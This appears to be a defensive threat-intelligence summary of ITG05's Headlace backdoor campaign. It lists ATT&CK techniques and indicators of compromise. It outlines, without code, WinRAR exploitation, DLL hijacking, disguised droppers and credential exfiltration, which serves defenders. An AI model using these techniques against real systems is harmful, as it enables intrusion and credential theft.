Threat intelligence from X-Force details ITG05’s use of the Israel-Hamas conflict as lure material to deliver the Headlace backdoor across at least 13 countries, leveraging official documents and decoys. The malware chain comprises a dropper, a VBScript launcher, and a headless MS Edge component that downloads secondary payloads and can exfiltrate credentials. #Headlace #ITG05 #APT28 #RazumkovCentre #BankofIsrael #UNHumanRightsCouncil
Keypoints
- ITG05’s operation marks the first known use of the Israel-Hamas conflict to deliver the Headlace backdoor.
- The campaign targets multiple institutions via lures tied to the United Nations, Bank of Israel, CRS, European Parliament, Razumkov Centre, and an Azerbaijan-Belarus commission.
- X-Force observed Headlace deployments aimed at at least 13 nations, with geolocation perimeters highlighting UNHRC member states.
- Lures include .RAR archives exploiting CVE-2023-38831 and DLL-hijacking techniques to run Headlace.
- Headlace is multi-component: a .CMD dropper, a .VBS launcher, and a backdoor that uses MS Edge in headless mode to fetch secondary payloads, likely for credential exfiltration.
- The infection chain involves abusing commercial hosting (Mockbin/Mocky/infinityfreeapp), browser checks via ipapi.co, and multiple delivery steps before payload execution.
- Execution chains include WinRAR exploitation, DLL hijacking, and direct execution masquerading as Windows updates; post-foothold activity focuses on credential theft and exfiltration.
MITRE Techniques
- [T1566.002] Spearphishing Link – Phishing emails with URLs leading to malicious archives; “The phishing URL would contain a unique hardcoded URL parameter ‘id’. This ID is necessary to be able to download the lure archive as well as Headlace’s secondary payloads and likely allows ITG05 to track infections through all stages.”
- [T1105] Ingress Tool Transfer – Downloading secondary payloads from a second download site after the initial dropper; “The backdoor uses a second download site to stage secondary payloads.”
- [T1059.005] VBScript – VBScript launcher used to execute the BAT file; “The .VBS launcher uses the Wscript.Shell object to execute the .BAT file.”
- [T1574.001] DLL Search Order Hijacking – DLL hijacking used to run the Headlace payload; “The DLL-hijacking chain involves delivering a legitimate Microsoft Calc.exe binary that is susceptible to DLL-hijacking… The DLL’s main function was overwritten to execute the hidden .CMD file that is the Headlace payload.”
- [T1036] Masquerading – Disguising the dropper as a Windows update script; “In this chain, the threat actor directs the victim to execute the Headlace CMD dropper directly by disguising it as a Windows update script and reporting fake update status messages in the console.”
- [T1027] Obfuscated/Compressed Files and Information – Use of hidden/obfuscated content within a ZIP; “the malicious ZIP file would contain several hidden files and only one visible executable, with a long whitespace-padded filename, in order to hide the extension.”
- [T1003.001] NTLM Credential Dumping – Capturing credentials and attempting exfiltration; “to capture NTLM credentials or SMB hashes of user accounts and attempt to exfiltrate them via the TOR network.”
Indicators of Compromise
- [Domain] mockbin.com – hosting malicious archives used in spearphishing campaigns via Mockbin services.
- [Domain] mocky.io – another hosting service used to stage lure payloads.
- [Domain] infinityfreeapp.com – legitimate hosting used to deliver malicious payloads.
- [URL] https://ipapi.co/json – browser/geolocation check prior to payload delivery.
- [File Name] SEDE-PV-2023-10-09-1_EN.docx – lure document tied to European Parliament materials.
- [File Name] war.docx – lure document containing UN-related content.
- [File Name] roadm ap.docx/Roadmap.docx – lure document linked to Belarus-Azerbaijan cooperation.
- [File Name] 2023-12-bois-position-on-accessing-capital-pr.docx – lure referencing Bank of Israel press release.
- [File Name] IN11897.pdf – lure referencing CRS update on Ukraine/eu policy.
- [File Name] filedwn.php – part of the download chain for lure payloads.
- [File Name] execdwn.php – part of the second-stage payload download chain.
- [File Type] .RAR – archive format used to deliver the initial lure; “lure documents contained in a .RAR archive.”
- [File Type] .CMD – dropper and command scripts used in multiple execution chains.
- [File Type] .VBS – launcher script for the backdoor.
- [File Type] .BAT – backdoor component invoked by the launcher.
- [File] Headlace – name of the backdoor involved in infection chains.
- [URL] www.msn.com – victim redirect after lure download during infection flow.
- [Process] msedge – headless browser process used to download secondary payloads (evidence of headless browser usage).